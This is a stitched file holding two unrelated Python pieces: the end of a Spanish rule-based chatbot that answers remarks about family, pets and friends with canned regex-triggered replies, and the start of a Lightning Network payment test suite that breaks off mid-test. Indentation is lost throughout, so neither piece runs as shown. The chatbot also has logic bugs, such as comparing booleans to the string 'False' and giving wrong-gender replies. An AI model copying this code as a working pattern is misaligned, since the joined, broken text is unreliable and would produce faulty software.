ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_TRA = re.compile('(.*|^)((no\strabajo)|(no\stengo\strabajo))($|.*)');
NO_MATCH = re.match(NO_TRA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('trabajo',username)
STATES['trabajo'] = True
NO_ESC = re.compile('(.*|^)no\sestudio($|.*)');
NO_MATCH = re.match(NO_ESC,message_)
if NO_MATCH:
my_conexion.cambiar_estado('escuela',username)
STATES['escuela'] = True
MAMA = re.compile('(.*|^)((M|m)i\s(mama|mamá|madre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente|bien|alegre|animada|apasionada|cariñosa|contenta|encantada|euforica|exitada|feliz|satisfecha|orgullosa))($|.*)');
MAMA_MATCH = re.match(MAMA,message_)
if MAMA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu mamá este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu mamá..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu mamá..."
STATES['mama'] = True
MAMA = re.compile('(.*|^)((M|m)i\s(mama|mamá|madre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumada|mal|mala|enferma|afligida|agotada|amargada|angustiada|apatica|arrepentida|asustada|aterrada|avergonzada|celosa|cansada|confundida|debil|decaida|decepcionada|deprimida|desanimada|desesperada|enojada|infeliz|herida|insegura|triste|tensa|molesta|irritada))($|.*)');
MAMA_MATCH = re.match(MAMA,message_)
if MAMA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu mama este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu mamá..."
if ev == 3:
ans =ans + "\nLeer esto de tu mama no me gusta, lo siento por ella..."
STATES['mama'] = True
PAPA = re.compile('(.*|^)((M|m)i\s(papa|papá|padre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente|bien|alegre|animado|apasionado|cariñoso|contento|encantado|euforico|exitado|feliz|satisfecho|orgullos))($|.*)');
PAPA_MATCH = re.match(PAPA,message_)
if PAPA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu papá este así..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu papá..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu padre..."
STATES['papa'] = True
PAPA = re.compile('(.*|^)((M|m)i\s(papa|papá|padre)\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumado|mal|afligido|agotado|malo|enfermo|amargado|angustiado|apatico|arrepentido|asustado|aterrado|avergonzado|celoso|cansado|confundido|debil|decaido|decepcionado|deprimido|desanimado|desesperado|enojado|infeliz|herido|inseguro|triste|tenso|molesto|irritado))($|.*)');
PAPA_MATCH = re.match(PAPA,message_)
if PAPA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu papa este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu papa..."
if ev == 3:
ans =ans + "\nLeer esto de tu papa no me gusta, lo siento por ella..."
STATES['papa'] = True
HERMANO = re.compile('(.*|^)((M|m)i\s(herman(o|a))\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente|bien|alegre|animado|apasionado|cariñoso|contento|encantado|euforico|exitado|feliz|satisfecho|orgullos))($|.*)');
HERMANO_MATCH = re.match(HERMANO,message_)
if HERMANO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu hermano este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu hermano..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu hermano..."
STATES['hermano'] = True
HERMANO = re.compile('(.*|^)((M|m)i\s(herman(o|a))\s(es|esta)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumado|afligido|agotado|malo|enfermo|amargado|angustiado|apatico|arrepentido|asustado|aterrado|avergonzado|celoso|cansado|confundido|debil|decaido|decepcionado|deprimido|desanimado|desesperado|enojado|infeliz|herido|inseguro|triste|tenso|molesto|irritado))($|.*)');
HERMANO_MATCH = re.match(HERMANO,message_)
if HERMANO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu hermano este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu hermano..."
if ev == 3:
ans =ans + "\nLeer esto de tu hermano no me gusta, lo siento por ella..."
STATES['hermano'] = True
MASCOTA = re.compile('(.*|^)((M|m)i(.*|s)\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)(.*|s)\s(es|esta|estan|son)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente(.*|s)|bien|alegre(.*|s)|animad(o|a)(.*|s)|apasionad(o|a)(.*|s)|cariños(o|a)(.*|s)|content(o|a)(.*|s)|encantad(o|a)(.*|s)|euforic(o|a)(.*|s)|exitad(o|a)(.*|s)|feliz|felices|satisfech(o|a)(.*|s)|orgullos(o|a)(.*|s)))($|.*)');
MASCOTA_MATCH = re.match(MASCOTA,message_)
if MASCOTA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu mascota este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu mascota..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu mascota..."
STATES['mascota'] = True
MASCOTA = re.compile('(.*|^)((M|m)i(.*|s)\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)(.*|s)\s(es|esta|estan|son)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumad(o|a)(.*|s)|mal(o|a)|enferm(o|a)|afligid(o|a)(.*|s)|agotad(o|a)(.*|s)|amargad(o|a)(.*|s)|angustiad(o|a)(.*|s)|apatic(o|a)(.*|s)|arrepentid(o|a)(.*|s)|asustad(o|a)(.*|s)|aterrad(o|a)(.*|s)|avergonzad(o|a)(.*|s)|celos(o|a)(.*|s)|cansad(o|a)(.*|s)|confundid(o|a)(.*|s)|debil|debiles|decaid(o|a)(.*|s)|decepcionad(o|a)(.*|s)|deprimid(o|a)(.*|s)|desanimad(o|a)(.*|s)|desesperad(o|a)(.*|s)|enojad(o|a)(.*|s)|infeliz|infelices|herid(o|a)(.*|s)|insegur(o|a)(.*|s)|triste(.*|s)|tens(o|a)(.*|s)|molest(o|a)(.*|s)|irritad(o|a)(.*|s)))($|.*)');
MASCOTA_MATCH = re.match(MASCOTA,message_)
if MASCOTA_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu mascota este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu mascota..."
if ev == 3:
ans =ans + "\nLeer esto de tu mascota no me gusta, lo siento por ella..."
STATES['mascota'] = True
AMIGO = re.compile('(.*|^)((M|m)i(.*|s)\s(mejores amigos|mejor amigo|amig(o|a)(.*|s))\s(es|esta|son|estan)(.*|algo|un poco|mucho|mucho muy|muy)\s(excelente(.*|s)|bien|alegre|alegres|animad(o|a)|animad(o|a)s|apasionad(o|a)|apasionad(o|a)s|cariños(o|a)|cariños(o|a)s|content(o|a)|content(o|a)s|encantad(o|a)|encantad(o|a)s|euforic(o|a)|euforic(o|a)s|exitad(o|a)|exitad(o|a)s|feliz|felices|satisfech(a|o)|satisfech(o|a)s|orgullos(o|a)|orgullos(o|a)s))($|.*)');
AMIGO_MATCH = re.match(AMIGO,message_)
if AMIGO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nOh Que bien que tu amigo este asi..."
if ev == 2:
ans =ans + "\nMe alegra leer esto de tu amigo..."
if ev == 3:
ans =ans + "\nMaravilloso, que todo siga asi para tu amigo..."
STATES['amigo'] = True
AMIGO = re.compile('(.*|^)((M|m)i(.*|s)\s(mejores amigos|mejor amigo|amig(o|a)(.*|s))\s(es|esta|son|estan)(.*|algo|un poco|mucho|mucho muy|muy)\s(abrumad(o|a)(.*|s)|afligid(o|a)(.*|s)|agotad(o|a)(.*|s)|amargad(o|a)(.*|s)|angustiad(o|a)(.*|s)|apatic(o|a)(.*|s)|arrepentid(o|a)(.*|s)|asustad(o|a)(.*|s)|aterrad(o|a)(.*|s)|avergonzad(o|a)(.*|s)|celos(o|a)(.*|s)|cansad(o|a)(.*|s)|confundid(o|a)(.*|s)|debil|debiles|decaid(o|a)(.*|s)|decepcionad(o|a)(.*|s)|deprimid(o|a)(.*|s)|desanimad(o|a)(.*|s)|desesperad(o|a)(.*|s)|enojad(o|a)(.*|s)|infeliz|infelices|herid(o|a)(.*|s)|insegur(o|a)(.*|s)|triste(.*|s)|tens(o|a)(.*|s)|molest(o|a)(.*|s)|irritad(o|a)(.*|s)))($|.*)');
AMIGO_MATCH = re.match(AMIGO,message_)
if AMIGO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nmmm que mal que tu amigo este asi..."
if ev == 2:
ans =ans + "\nLo siento, que todo mejore para tu amigo..."
if ev == 3:
ans =ans + "\nLeer esto de tu amigo no me gusta, lo siento por ella..."
STATES['amigo'] = True
TRABAJO = re.compile('(.*|^)(((M|m)i|(E|e)l|(E|e)n\sel)\s(negocio|empleo|trabajo)\s(es|esta|son|estuvo))($|.*)');
TRABAJO_MATCH = re.match(TRABAJO,message_)
if TRABAJO_MATCH:
STATES['trabajo'] = True
ESCUELA = re.compile('(.*|^)(((M|m)i|(E|e)l|(E|e)n\sel)\s(escuela|universidad|prepa|preparatoria|secu|secundaria|primaria)\s(es|esta|son|estuvo))($|.*)');
ESCUELA_MATCH = re.match(ESCUELA,message_)
if ESCUELA_MATCH:
STATES['escuela'] = True
# Bot follow-up prompts
if vez > 0:
ev = random.randint(1, 9)
if ev == 1:
ans = ans + "\n ¿cómo te fue hoy?..."
if ev == 2:
ans = ans + "\n ¿cómo estuvo tu dia de hoy?..."
if ev == 3:
ans = ans + "\n ¿que hiciste el dia de hoy?..."
if ev == 4:
ans = ans + "\n ¿algo interesante que hicieras hoy?..."
if ev == 5:
ans = ans + "\n ¿que te paso el dia de hoy?..."
if ev == 6:
ans = ans + "\n ¿Que mas hiciste en tu dia?..."
if ev == 7:
ans = ans + "\n Y ¿Que mas?..."
if ev == 8:
ans = ans + "\n ¿Algo mas que quieras platicarme?..."
if ev == 9:
ans = ans + "\n ¿Que mas hiciste?..."
if vez == 0:
ev = random.randint(1, 4)
if ev == 1:
ans = ans + "\n ¿cómo estas hoy?..."
if ev == 2:
ans = ans + "\n ¿cómo te sientes el dia de hoy?..."
if ev == 3:
ans = ans + "\n ¿cómo te sentiste hoy?..."
if ev == 4:
ans = ans + "\n ¿que te paso el dia de hoy?..."
# CHECK CONVERSATION STATE
if STATES['mama'] == 'False':
print(vez)
if vez > 2:
ans=ans + "\n Cuéntame, ¿Como esta tu mamá?"
elif STATES['papa']== 'False':
if vez > 0:
ans=ans + "\n¿Cómo esta tu papá?"
elif STATES['hermano']== 'False':
if vez > 0:
ans=ans + "\n¿Que tal tu hermano?"
elif STATES['mascota']== 'False':
if vez > 0:
ans=ans + "\n¿Que tal tu mascota?"
elif STATES['amigo']== 'False':
if vez > 0:
ans=ans + "\n¿Como esta tu mejor amigo?"
elif STATES['escuela']== 'False':
if vez > 0:
ans=ans + "\n¿Como vas en la escuela?"
elif STATES['trabajo']== 'False':
if vez > 0:
ans=ans + "\n¿Como estubo el trabajo?"
ADIOS = re.compile('(H|h)asta\sluego|HASTA\sLUEGO|(A|a)di(o|ó)s|ADI(O|Ó)S|(N|n)os\svemos|NOS\sVEMOS|(C|c)hao|CHAO|(B|b)ye|BYE($)');
ADIOS_MATCH = re.match(ADIOS,message_)
if ADIOS_MATCH:
vez = 100
ev = random.randint(1, 4)
if ev == 1:
ans ="\n Adios, fue un gusto platicar contigo."
if ev == 2:
ans ="\n Adios, Me encanta platicar contigo."
if ev == 3:
ans ="\n Adios, Te deseo suerte y que tus dias sean mejores."
if ev == 4:
ans ="\n Adios, Espero que vuelvas a platicar conmigo.... ;)"
vez = vez + 1
STATES['vez'] = vez
return ans
def sinAcentos(Mensaje):
    # Decompose accented characters (NFD) and drop the combining marks so the
    # regular expressions above only have to match unaccented, lowercase text.
    cadena = ''.join(c for c in unicodedata.normalize('NFD', str(Mensaje))
                     if unicodedata.category(c) != 'Mn')
    return cadena.lower()
|
from binascii import hexlify
from fixtures import * # noqa: F401,F403
from fixtures import TEST_NETWORK
from flaky import flaky # noqa: F401
from pyln.client import RpcError, Millisatoshi
from pyln.proto.onion import TlvPayload
from pyln.testing.utils import EXPERIMENTAL_DUAL_FUND
from utils import (
DEVELOPER, wait_for, only_one, sync_blockheight, TIMEOUT,
EXPERIMENTAL_FEATURES, env, VALGRIND
)
import copy
import os
import pytest
import random
import re
import string
import struct
import subprocess
import time
import unittest
@pytest.mark.developer("needs to deactivate shadow routing")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_pay(node_factory):
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(123000, 'test_pay', 'description')['bolt11']
before = int(time.time())
details = l1.rpc.dev_pay(inv, use_shadow=False)
after = time.time()
preimage = details['payment_preimage']
assert details['status'] == 'complete'
assert details['msatoshi'] == 123000
assert details['destination'] == l2.info['id']
assert details['created_at'] >= before
assert details['created_at'] <= after
invoices = l2.rpc.listinvoices('test_pay')['invoices']
assert len(invoices) == 1
invoice = invoices[0]
assert invoice['status'] == 'paid' and invoice['paid_at'] >= before and invoice['paid_at'] <= after
# Repeat payments are NOPs (if valid): we can hand null.
l1.rpc.dev_pay(inv, use_shadow=False)
# This won't work: can't provide an amount (even if correct!)
with pytest.raises(RpcError):
l1.rpc.pay(inv, 123000)
with pytest.raises(RpcError):
l1.rpc.pay(inv, 122000)
# Check pay_index is not null
outputs = l2.db_query('SELECT pay_index IS NOT NULL AS q FROM invoices WHERE label="label";')
assert len(outputs) == 1 and outputs[0]['q'] != 0
# Check payment of any-amount invoice.
for i in range(5):
label = "any{}".format(i)
inv2 = l2.rpc.invoice("any", label, 'description')['bolt11']
# Must provide an amount!
with pytest.raises(RpcError):
l1.rpc.pay(inv2)
l1.rpc.dev_pay(inv2, random.randint(1000, 999999), use_shadow=False)
# Should see 6 completed payments
assert len(l1.rpc.listsendpays()['payments']) == 6
# Test listsendpays indexed by bolt11.
payments = l1.rpc.listsendpays(inv)['payments']
assert len(payments) == 1 and payments[0]['payment_preimage'] == preimage
@pytest.mark.developer("needs to deactivate shadow routing")
def test_pay_amounts(node_factory):
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(Millisatoshi("123sat"), 'test_pay_amounts', 'description')['bolt11']
invoice = only_one(l2.rpc.listinvoices('test_pay_amounts')['invoices'])
assert isinstance(invoice['amount_msat'], Millisatoshi)
assert invoice['amount_msat'] == Millisatoshi(123000)
l1.rpc.dev_pay(inv, use_shadow=False)
invoice = only_one(l2.rpc.listinvoices('test_pay_amounts')['invoices'])
assert isinstance(invoice['amount_received_msat'], Millisatoshi)
assert invoice['amount_received_msat'] >= Millisatoshi(123000)
@pytest.mark.developer("needs to deactivate shadow routing")
def test_pay_limits(node_factory, compat):
"""Test that we enforce fee max percentage and max delay"""
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
# FIXME: pylightning should define these!
PAY_STOPPED_RETRYING = 210
inv = l3.rpc.invoice("any", "any", 'description')
# Fee too high.
err = r'Fee exceeds our fee budget: [1-9]msat > 0msat, discarding route'
with pytest.raises(RpcError, match=err) as err:
l1.rpc.call('pay', {'bolt11': inv['bolt11'], 'msatoshi': 100000, 'maxfeepercent': 0.0001, 'exemptfee': 0})
assert err.value.error['code'] == PAY_STOPPED_RETRYING
# It should have retried two more times (one without routehint and one with routehint)
status = l1.rpc.call('paystatus', {'bolt11': inv['bolt11']})['pay'][0]['attempts']
# We have an internal test to see if we can reach the destination directly
# without a routehint, that will enable a NULL-routehint. We will then try
# with the provided routehint, and the NULL routehint, resulting in 2
# attempts.
assert(len(status) == 2)
assert(status[0]['failure']['code'] == 205)
failmsg = r'CLTV delay exceeds our CLTV budget'
# Delay too high.
with pytest.raises(RpcError, match=failmsg) as err:
l1.rpc.call('pay', {'bolt11': inv['bolt11'], 'msatoshi': 100000, 'maxdelay': 0})
assert err.value.error['code'] == PAY_STOPPED_RETRYING
# Should also have retried two more times.
status = l1.rpc.call('paystatus', {'bolt11': inv['bolt11']})['pay'][1]['attempts']
assert(len(status) == 2)
assert(status[0]['failure']['code'] == 205)
# This works, because fee is less than exemptfee.
l1.rpc.dev_pay(inv['bolt11'], msatoshi=100000, maxfeepercent=0.0001,
exemptfee=2000, use_shadow=False)
status = l1.rpc.call('paystatus', {'bolt11': inv['bolt11']})['pay'][2]['attempts']
assert len(status) == 1
assert status[0]['strategy'] == "Initial attempt"
@pytest.mark.developer("Gossip is too slow without developer")
def test_pay_exclude_node(node_factory, bitcoind):
"""Test excluding the node if there's the NODE-level error in the failure_code
"""
# FIXME: Remove our reliance on HTLCs failing on startup and the need for
# this plugin
opts = [
{'disable-mpp': None},
{'plugin': os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')},
{},
{'fee-base': 100, 'fee-per-satoshi': 1000},
{}
]
l1, l2, l3, l4, l5 = node_factory.get_nodes(5, opts=opts)
node_factory.join_nodes([l1, l2, l3], wait_for_announce=True)
amount = 10**8
inv = l3.rpc.invoice(amount, "test1", 'description')['bolt11']
with pytest.raises(RpcError):
l1.rpc.pay(inv)
# It should have retried (once without routehint, too)
status = l1.rpc.call('paystatus', {'bolt11': inv})['pay'][0]['attempts']
# Excludes channel, then ignores routehint which includes that, then
# it excludes other channel.
assert len(status) == 2
assert status[0]['strategy'] == "Initial attempt"
assert status[0]['failure']['data']['failcodename'] == 'WIRE_TEMPORARY_NODE_FAILURE'
assert 'failure' in status[1]
# Get a fresh invoice, but do it before other routes exist, so routehint
# will be via l2.
inv = l3.rpc.invoice(amount, "test2", 'description')['bolt11']
assert only_one(l1.rpc.decodepay(inv)['routes'])[0]['pubkey'] == l2.info['id']
# l1->l4->l5->l3 is the longer route. This makes sure this route won't be
# tried for the first pay attempt. Just to be sure we also raise the fees
# that l4 leverages.
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
l4.rpc.connect(l5.info['id'], 'localhost', l5.port)
l5.rpc.connect(l3.info['id'], 'localhost', l3.port)
scid14, _ = l1.fundchannel(l4, 10**6, wait_for_active=False)
scid45, _ = l4.fundchannel(l5, 10**6, wait_for_active=False)
scid53, _ = l5.fundchannel(l3, 10**6, wait_for_active=False)
bitcoind.generate_block(5)
l1.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid14),
r'update for channel {}/1 now ACTIVE'
.format(scid14),
r'update for channel {}/0 now ACTIVE'
.format(scid45),
r'update for channel {}/1 now ACTIVE'
.format(scid45),
r'update for channel {}/0 now ACTIVE'
.format(scid53),
r'update for channel {}/1 now ACTIVE'
.format(scid53)])
# This `pay` will work
l1.rpc.pay(inv)
# It should have retried (once without routehint, too)
status = l1.rpc.call('paystatus', {'bolt11': inv})['pay'][0]['attempts']
# Excludes channel, then ignores routehint which includes that, then
# it excludes other channel.
assert len(status) == 2
assert status[0]['strategy'] == "Initial attempt"
assert status[0]['failure']['data']['failcodename'] == 'WIRE_TEMPORARY_NODE_FAILURE'
assert 'success' in status[1]
def test_pay0(node_factory):
"""Test paying 0 amount
"""
l1, l2 = node_factory.line_graph(2)
chanid = l1.get_channel_scid(l2)
# Get any-amount invoice
inv = l2.rpc.invoice("any", "any", 'description')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 0,
'id': l2.info['id'],
'delay': 10,
'channel': chanid
}
# Amount must be nonzero!
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError, match=r'WIRE_AMOUNT_BELOW_MINIMUM'):
l1.rpc.waitsendpay(rhash)
@pytest.mark.developer("needs DEVELOPER=1")
def test_pay_disconnect(node_factory, bitcoind):
"""If the remote node has disconnected, we fail payment, but can try again when it reconnects"""
l1, l2 = node_factory.line_graph(2, opts={'dev-max-fee-multiplier': 5,
'may_reconnect': True,
'allow_warning': True})
# Dummy payment to kick off update_fee messages
l1.pay(l2, 1000)
inv = l2.rpc.invoice(123000, 'test_pay_disconnect', 'description')
rhash = inv['payment_hash']
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels()['channels']] == [True, True])
# Can't use `pay` since that'd notice that we can't route, due to disabling channel_update
route = l1.rpc.getroute(l2.info['id'], 123000, 1)["route"]
l2.stop()
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'] is False)
# Can't pay while it's offline.
with pytest.raises(RpcError, match=r'failed: WIRE_TEMPORARY_CHANNEL_FAILURE \(First peer not ready\)'):
l1.rpc.sendpay(route, rhash)
l2.start()
l1.daemon.wait_for_log('peer_out WIRE_CHANNEL_REESTABLISH')
# Make l2 upset by asking for crazy fee.
l1.set_feerates((10**6, 10**6, 10**6, 10**6), False)
# Wait for l1 notice
l1.daemon.wait_for_log(r'Peer transient failure in CHANNELD_NORMAL: channeld WARNING: .*: update_fee \d+ outside range 1875-75000')
# Make l2 fail hard.
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.daemon.wait_for_log('sendrawtx exit')
bitcoind.generate_block(1, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
# Should fail due to permanent channel failure
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay(route, rhash)
assert not l1.daemon.is_in_log('Payment is still in progress')
# After it sees block, someone should close channel.
l1.daemon.wait_for_log('ONCHAIN')
@pytest.mark.developer("needs DEVELOPER=1 for dev_suppress_gossip")
def test_pay_get_error_with_update(node_factory):
"""We should process an update inside a temporary_channel_failure"""
l1, l2, l3 = node_factory.line_graph(3, opts={'log-level': 'io'}, fundchannel=True, wait_for_announce=True)
chanid2 = l2.get_channel_scid(l3)
inv = l3.rpc.invoice(123000, 'test_pay_get_error_with_update', 'description')
# Make sure l2 doesn't tell l1 directly that channel is disabled.
l2.rpc.dev_suppress_gossip()
l3.stop()
# Make sure that l2 has seen disconnect, considers channel disabled.
wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(chanid2)['channels']] == [False, False])
assert(l1.is_channel_active(chanid2))
with pytest.raises(RpcError, match=r'WIRE_TEMPORARY_CHANNEL_FAILURE'):
l1.rpc.pay(inv['bolt11'])
# Make sure we get an onionreply, without the type prefix of the nested
# channel_update, and it should patch it to include a type prefix. The
# prefix 0x0102 should be in the channel_update, but not in the
# onionreply (negation of 0x0102 in the RE)
l1.daemon.wait_for_log(r'Extracted channel_update 0102.*from onionreply 10070088[0-9a-fA-F]{88}')
# And now monitor for l1 to apply the channel_update we just extracted
wait_for(lambda: not l1.is_channel_active(chanid2))
@pytest.mark.developer("needs to deactivate shadow routing")
def test_pay_optional_args(node_factory, compat):
l1, l2 = node_factory.line_graph(2)
inv1 = l2.rpc.invoice(123000, 'test_pay', 'desc')['bolt11']
l1.rpc.dev_pay(inv1, label='desc', use_shadow=False)
payment1 = l1.rpc.listsendpays(inv1)['payments']
assert len(payment1) and payment1[0]['msatoshi_sent'] == 123000
assert payment1[0]['label'] == 'desc'
inv2 = l2.rpc.invoice(321000, 'test_pay2', 'description')['bolt11']
l1.rpc.dev_pay(inv2, riskfactor=5.0, use_shadow=False)
payment2 = l1.rpc.listsendpays(inv2)['payments']
assert(len(payment2) == 1)
# The pay plugin uses `sendonion` since 0.9.0 and `lightningd` doesn't
# learn about the amount we intended to send (that's why we annotate the
# root of a payment tree with the bolt11 invoice).
anyinv = l2.rpc.invoice('any', 'any_pay', 'desc')['bolt11']
l1.rpc.dev_pay(anyinv, label='desc', msatoshi='500', use_shadow=False)
payment3 = l1.rpc.listsendpays(anyinv)['payments']
assert len(payment3) == 1
assert payment3[0]['label'] == 'desc'
# Should see 3 completed transactions
assert len(l1.rpc.listsendpays()['payments']) == 3
@pytest.mark.developer("needs to deactivate shadow routing")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_payment_success_persistence(node_factory, bitcoind, executor):
# Start two nodes and open a channel.. die during payment.
# Feerates identical so we don't get gratuitous commit to update them
disconnect = ['+WIRE_COMMITMENT_SIGNED']
if EXPERIMENTAL_DUAL_FUND:
# We have to add an extra 'wire-commitment-signed' because
# dual funding uses this for channel establishment also
disconnect = ['=WIRE_COMMITMENT_SIGNED'] + disconnect
l1 = node_factory.get_node(disconnect=disconnect,
options={'dev-no-reconnect': None},
may_reconnect=True,
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chanid, _ = l1.fundchannel(l2, 100000)
inv1 = l2.rpc.invoice(1000, 'inv1', 'inv1')
# Fire off a pay request, it'll get interrupted by a restart
executor.submit(l1.rpc.dev_pay, inv1['bolt11'], use_shadow=False)
l1.daemon.wait_for_log(r'dev_disconnect: \+WIRE_COMMITMENT_SIGNED')
print("Killing l1 in mid HTLC")
l1.daemon.kill()
# Restart l1, without disconnect stuff.
del l1.daemon.opts['dev-no-reconnect']
del l1.daemon.opts['dev-disconnect']
# Should reconnect, and sort the payment out.
l1.start()
wait_for(lambda: l1.rpc.listsendpays()['payments'][0]['status'] != 'pending')
payments = l1.rpc.listsendpays()['payments']
invoices = l2.rpc.listinvoices('inv1')['invoices']
assert len(payments) == 1 and payments[0]['status'] == 'complete'
assert len(invoices) == 1 and invoices[0]['status'] == 'paid'
l1.wait_channel_active(chanid)
# A duplicate should succeed immediately (nop) and return correct preimage.
preimage = l1.rpc.dev_pay(inv1['bolt11'],
use_shadow=False)['payment_preimage']
assert l1.rpc.dev_rhash(preimage)['rhash'] == inv1['payment_hash']
@pytest.mark.developer("needs DEVELOPER=1")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_payment_failed_persistence(node_factory, executor):
# Start two nodes and open a channel.. die during payment.
# Feerates identical so we don't get gratuitous commit to update them
disconnect = ['+WIRE_COMMITMENT_SIGNED']
if EXPERIMENTAL_DUAL_FUND:
# We have to add an extra 'wire-commitment-signed' because
# dual funding uses this for channel establishment also
disconnect = ['=WIRE_COMMITMENT_SIGNED'] + disconnect
l1 = node_factory.get_node(disconnect=disconnect,
options={'dev-no-reconnect': None},
may_reconnect=True,
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 100000)
# Expires almost immediately, so it will fail.
inv1 = l2.rpc.invoice(1000, 'inv1', 'inv1', 5)
# Fire off a pay request, it'll get interrupted by a restart
executor.submit(l1.rpc.pay, inv1['bolt11'])
l1.daemon.wait_for_log(r'dev_disconnect: \+WIRE_COMMITMENT_SIGNED')
print("Killing l1 in mid HTLC")
l1.daemon.kill()
# Restart l1, without disconnect stuff.
del l1.daemon.opts['dev-no-reconnect']
del l1.daemon.opts['dev-disconnect']
# Make sure invoice has expired.
time.sleep(5 + 1)
# Should reconnect, and fail the payment
l1.start()
wait_for(lambda: l1.rpc.listsendpays()['payments'][0]['status'] != 'pending')
payments = l1.rpc.listsendpays()['payments']
invoices = l2.rpc.listinvoices('inv1')['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'expired'
assert len(payments) == 1 and payments[0]['status'] == 'failed'
# Another attempt should also fail.
with pytest.raises(RpcError):
l1.rpc.pay(inv1['bolt11'])
@pytest.mark.developer("needs DEVELOPER=1")
def test_payment_duplicate_uncommitted(node_factory, executor):
# We want to test two payments at the same time, before we send commit
l1 = node_factory.get_node(disconnect=['=WIRE_UPDATE_ADD_HTLC-nocommit'])
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 100000)
inv1 = l2.rpc.invoice(1000, 'inv1', 'inv1')
# Start first payment, but not yet in db.
fut = executor.submit(l1.rpc.pay, inv1['bolt11'])
# Make sure that's started...
l1.daemon.wait_for_log('dev_disconnect: =WIRE_UPDATE_ADD_HTLC-nocommit')
# We should see it in listsendpays
payments = l1.rpc.listsendpays()['payments']
assert len(payments) == 1
assert payments[0]['status'] == 'pending' and payments[0]['payment_hash'] == inv1['payment_hash']
# Second one will succeed eventually.
fut2 = executor.submit(l1.rpc.pay, inv1['bolt11'])
# Now, let it commit.
l1.rpc.dev_reenable_commit(l2.info['id'])
# These should succeed.
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.developer("Too slow without --dev-fast-gossip")
def test_pay_maxfee_shadow(node_factory):
"""Test that we respect maxfeepercent for shadow routing."""
l1, l2, l3 = node_factory.line_graph(3, fundchannel=True,
wait_for_announce=True)
# We use this to search for shadow routes
wait_for(
lambda: len(l1.rpc.listchannels(source=l2.info["id"])["channels"]) > 1
)
# shadow routes are random, so run multiple times.
for i in range(5):
# A tiny amount, we must not add the base_fee between l2 and l3
amount = 2
bolt11 = l2.rpc.invoice(amount, "tiny.{}".format(i), "tiny")["bolt11"]
pay_status = l1.rpc.pay(bolt11)
assert pay_status["amount_msat"] == Millisatoshi(amount)
# shadow routes are random, so run multiple times.
for i in range(5):
# A bigger amount, shadow routing could have been used but we set a low
# maxfeepercent.
amount = 20000
bolt11 = l2.rpc.invoice(amount, "big.{}".format(i), "bigger")["bolt11"]
pay_status = l1.rpc.pay(bolt11, maxfeepercent="0.000001")
assert pay_status["amount_msat"] == Millisatoshi(amount)
def test_sendpay(node_factory):
l1, l2 = node_factory.line_graph(2, fundamount=10**6)
amt = 200000000
